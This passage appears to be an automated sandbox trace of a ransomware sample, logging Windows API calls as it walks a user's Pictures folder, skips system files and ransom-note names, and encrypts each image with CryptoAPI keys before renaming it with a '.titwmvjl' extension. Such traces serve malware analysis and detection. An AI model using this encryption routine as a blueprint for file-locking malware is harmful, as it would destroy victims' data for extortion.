liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.762] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0094.762] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.762] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.762] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.762] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0094.762] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.762] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.762] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.763] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0094.763] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.763] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.763] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.763] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0094.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.764] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.764] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.764] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0094.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.764] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5032f8) returned 1 [0094.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.765] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0094.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.765] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0094.765] GetLastError () returned 0x0 [0094.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.765] CryptDestroyKey (hKey=0x5032f8) returned 1 [0094.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.765] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.766] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0094.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.766] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5032f8) returned 1 [0094.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.766] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0094.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.767] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0094.767] GetLastError () returned 0x0 [0094.767] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.767] CryptDestroyKey (hKey=0x5032f8) returned 1 [0094.767] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.767] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.767] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.767] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.768] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x412d, lpOverlapped=0x0) returned 1 [0094.778] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xffffbed3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.778] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x412d, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x412d, lpOverlapped=0x0) returned 1 [0094.779] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.779] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0094.780] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.784] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.784] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.785] CloseHandle (hObject=0x2bc) returned 1 [0094.785] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\N5MNejrqSH2rgwdQdper.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\n5mnejrqsh2rgwdqdper.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\N5MNejrqSH2rgwdQdper.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\n5mnejrqsh2rgwdqdper.png.titwmvjl"), dwFlags=0x1) returned 1 [0094.786] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.786] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0094.786] lstrcmpW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2=".") returned 1 [0094.786] lstrcmpW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="..") returned 1 [0094.786] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\", lpString2="PSUCe_di5jRXKawO3C60.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\PSUCe_di5jRXKawO3C60.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\PSUCe_di5jRXKawO3C60.bmp" [0094.786] lstrlenW (lpString=".titwmvjl") returned 9 [0094.786] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\PSUCe_di5jRXKawO3C60.bmp") returned 73 [0094.786] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.786] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\PSUCe_di5jRXKawO3C60.bmp.titwmvjl") returned 82 [0094.786] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\PSUCe_di5jRXKawO3C60.bmp") returned 73 [0094.786] lstrlenW (lpString=".bmp") returned 4 [0094.786] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.787] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0094.787] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0094.787] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.787] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\PSUCe_di5jRXKawO3C60.bmp") returned 73 [0094.787] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\PSUCe_di5jRXKawO3C60.bmp") returned 73 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="desktop.ini") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="autorun.inf") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="ntuser.dat") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="iconcache.db") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="bootsect.bak") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="boot.ini") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="ntuser.dat.log") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="thumbs.db") returned -1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="CRAB-DECRYPT.html") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="ntldr") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="NTDETECT.COM") returned 1 [0094.787] lstrcmpiW (lpString1="PSUCe_di5jRXKawO3C60.bmp", lpString2="Bootfont.bin") returned 1 [0094.787] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\PSUCe_di5jRXKawO3C60.bmp") returned 73 [0094.787] lstrlenW (lpString=".bmp") returned 4 [0094.787] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.787] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0094.787] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.788] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.788] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\PSUCe_di5jRXKawO3C60.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\psuce_di5jrxkawo3c60.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0094.788] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.788] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0094.789] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.789] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.789] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0094.789] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.790] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.790] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.790] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0094.790] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.790] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.790] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.790] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.790] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0094.790] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.791] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.791] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.791] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0094.791] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.791] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.791] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.791] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.791] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0094.792] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.792] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503778) returned 1 [0094.792] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.792] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0094.792] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.792] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0094.792] GetLastError () returned 0x0 [0094.792] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.793] CryptDestroyKey (hKey=0x503778) returned 1 [0094.793] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.793] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.793] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.793] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0094.793] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.793] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503578) returned 1 [0094.793] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.794] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0094.794] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.794] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0094.794] GetLastError () returned 0x0 [0094.794] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.794] CryptDestroyKey (hKey=0x503578) returned 1 [0094.794] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.794] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.794] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.795] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.795] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x13839, lpOverlapped=0x0) returned 1 [0094.807] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffec7c7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.807] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13839, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x13839, lpOverlapped=0x0) returned 1 [0094.809] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.809] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0094.811] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.814] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.815] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.815] CloseHandle (hObject=0x2bc) returned 1 [0094.815] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\PSUCe_di5jRXKawO3C60.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\psuce_di5jrxkawo3c60.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\PSUCe_di5jRXKawO3C60.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\psuce_di5jrxkawo3c60.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0094.816] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.816] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0094.816] lstrcmpW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2=".") returned 1 [0094.816] lstrcmpW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="..") returned 1 [0094.816] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\", lpString2="rB7m3FfliMS_mI8U6Mp.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\rB7m3FfliMS_mI8U6Mp.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\rB7m3FfliMS_mI8U6Mp.gif" [0094.816] lstrlenW (lpString=".titwmvjl") returned 9 [0094.816] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\rB7m3FfliMS_mI8U6Mp.gif") returned 72 [0094.816] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.816] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\rB7m3FfliMS_mI8U6Mp.gif.titwmvjl") returned 81 [0094.817] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\rB7m3FfliMS_mI8U6Mp.gif") returned 72 [0094.817] lstrlenW (lpString=".gif") returned 4 [0094.817] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.817] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".gif ") returned 5 [0094.817] lstrcmpiW (lpString1=".gif", lpString2=".titwmvjl") returned -1 [0094.817] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.817] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\rB7m3FfliMS_mI8U6Mp.gif") returned 72 [0094.817] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\rB7m3FfliMS_mI8U6Mp.gif") returned 72 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="desktop.ini") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="autorun.inf") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="ntuser.dat") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="iconcache.db") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="bootsect.bak") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="boot.ini") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="ntuser.dat.log") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="thumbs.db") returned -1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="KRAB-DECRYPT.html") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="CRAB-DECRYPT.html") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="ntldr") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="NTDETECT.COM") returned 1 [0094.817] lstrcmpiW (lpString1="rB7m3FfliMS_mI8U6Mp.gif", lpString2="Bootfont.bin") returned 1 [0094.817] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\rB7m3FfliMS_mI8U6Mp.gif") returned 72 [0094.817] lstrlenW (lpString=".gif") returned 4 [0094.817] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.818] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".gif ") returned 5 [0094.818] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.818] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.818] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\rB7m3FfliMS_mI8U6Mp.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\rb7m3fflims_mi8u6mp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0094.818] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.818] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0094.819] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.819] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.819] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0094.820] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.820] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.820] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.820] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0094.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.820] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.820] 